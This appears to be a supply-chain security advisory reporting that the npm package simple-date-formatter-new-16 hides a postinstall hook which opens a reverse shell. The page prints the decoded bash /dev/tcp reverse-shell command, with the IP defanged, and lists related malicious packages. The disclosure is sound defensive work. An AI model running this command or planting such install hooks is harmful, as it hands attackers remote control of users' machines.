simple-date-formatter-new-16@1.0.0
Malicious code in simple-date-formatter-new-16 (npm)
T1059.004 · Unix ShellT1059.007 · JavaScriptT1071.001 · Web Protocols
Analysis
The postinstall hook executes a reversed-string bash command that decodes to `bash -i >& /dev/tcp/124[.]221[.]154[.]135/4444 0>&1`, opening an interactive reverse shell to 124[.]221[.]154[.]135:4444 on the installer's machine at install time. The package is a trivial date-formatter stub with no legitimate reason to open a network shell.
- analyzed by
- Leitwacht
- first seen
- Sep 24, 2026, 08:09 AM
- analyzed
- Sep 24, 2026, 08:10 AM
Related advisories
- internallib_v463@1.0.2
- internallib_v657@1.0.1
- @nimbsuedge3/xar@1.1.1
- @nimbusedge2/xa@1.1.0
- @nimbusedge2/x@1.1.1
- @nimbusedge2/auth@1.1.1
- strapi-plugin-feedmeeb@3.6.8
- strapi-plugin-persh-meeb@3.6.8
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.